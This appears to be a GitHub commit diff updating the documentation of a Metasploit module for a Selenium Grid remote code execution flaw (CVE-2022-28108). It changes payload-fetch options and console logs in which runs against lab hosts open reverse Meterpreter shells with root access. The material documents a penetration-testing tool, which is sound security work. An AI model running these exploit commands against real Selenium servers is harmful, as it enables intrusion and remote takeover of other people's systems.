You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
FETCH_DELETE true yes Attempt to delete the binary after execution
68
-
FETCH_FILENAME QqkwqZES no Name to use on remote system when storing payload; cannot contain spaces or slashes
68
+
FETCH_FILENAME NnnZmAGfjJoa no Name to use on remote system when storing payload; cannot contain spaces or slashes
69
69
FETCH_SRVHOST no Local IP to use for serving payload
70
70
FETCH_SRVPORT 8080 yes Local port to use for serving payload
71
71
FETCH_URIPATH no Local URI to use for serving payload
@@ -88,12 +88,14 @@ msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=1
88
88
[*] Started reverse TCP handler on 192.168.56.1:4444
89
89
[*] Running automatic check ("set AutoCheck false" to disable)
90
90
[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
91
-
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:47990) at 2024-12-30 12:46:43 +0900
91
+
[*] Started session (3191e005-977b-40c9-8c70-7e2f4ef4f922).
92
+
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:43182) at 2025-01-04 10:01:09 +0900
93
+
[*] Failed to delete the session (3191e005-977b-40c9-8c70-7e2f4ef4f922). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
92
94
93
95
meterpreter > getuid
94
96
Server username: root
95
97
meterpreter > sysinfo
96
-
Computer : 172.17.0.3
98
+
Computer : 172.17.0.2
97
99
OS : Ubuntu 20.04 (Linux 6.8.0-51-generic)
98
100
Architecture : x64
99
101
BuildTuple : x86_64-linux-musl
@@ -107,12 +109,14 @@ msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=1
107
109
[*] Started reverse TCP handler on 192.168.56.1:4444
108
110
[*] Running automatic check ("set AutoCheck false" to disable)
109
111
[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
110
-
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:33048) at 2024-12-30 12:48:53 +0900
112
+
[*] Started session (dc849fa9-0b61-4862-8766-21f1cb47c827).
113
+
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:54410) at 2025-01-04 10:03:37 +0900
114
+
[*] Failed to delete the session (dc849fa9-0b61-4862-8766-21f1cb47c827). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
111
115
112
116
meterpreter > getuid
113
117
Server username: root
114
118
meterpreter > sysinfo
115
-
Computer : 172.17.0.4
119
+
Computer : 172.17.0.3
116
120
OS : Ubuntu 18.04 (Linux 6.8.0-51-generic)
117
121
Architecture : x64
118
122
BuildTuple : x86_64-linux-musl
@@ -122,16 +126,18 @@ meterpreter >
122
126
123
127
### selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
124
128
```
125
-
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4448
129
+
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447
126
130
[*] Started reverse TCP handler on 192.168.56.1:4444
127
131
[*] Running automatic check ("set AutoCheck false" to disable)
128
132
[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
129
-
[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.16:43864) at 2024-12-30 12:58:33 +0900
133
+
[*] Started session (af8d64bc-cdf6-4a03-8706-e90bddbee1c2).
134
+
[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.16:40680) at 2025-01-04 10:05:44 +0900
135
+
[*] Failed to delete the session (af8d64bc-cdf6-4a03-8706-e90bddbee1c2). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
130
136
131
137
meterpreter > getuid
132
138
Server username: root
133
139
meterpreter > sysinfo
134
-
Computer : 172.17.0.2
140
+
Computer : 172.17.0.4
135
141
OS : Ubuntu 20.04 (Linux 6.8.0-51-generic)
136
142
Architecture : x64
137
143
BuildTuple : x86_64-linux-musl
@@ -141,16 +147,18 @@ meterpreter >
141
147
142
148
### selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
143
149
```
144
-
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4449
150
+
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4448
145
151
[*] Started reverse TCP handler on 192.168.56.1:4444
146
152
[*] Running automatic check ("set AutoCheck false" to disable)
147
153
[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
148
-
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:60066) at 2025-01-02 09:29:36 +0900
154
+
[*] Started session (1657b5ac-c514-431f-8c83-761c14012869).
155
+
[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.16:44868) at 2025-01-04 10:10:38 +0900
156
+
[*] Failed to delete the session (1657b5ac-c514-431f-8c83-761c14012869). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
0 commit comments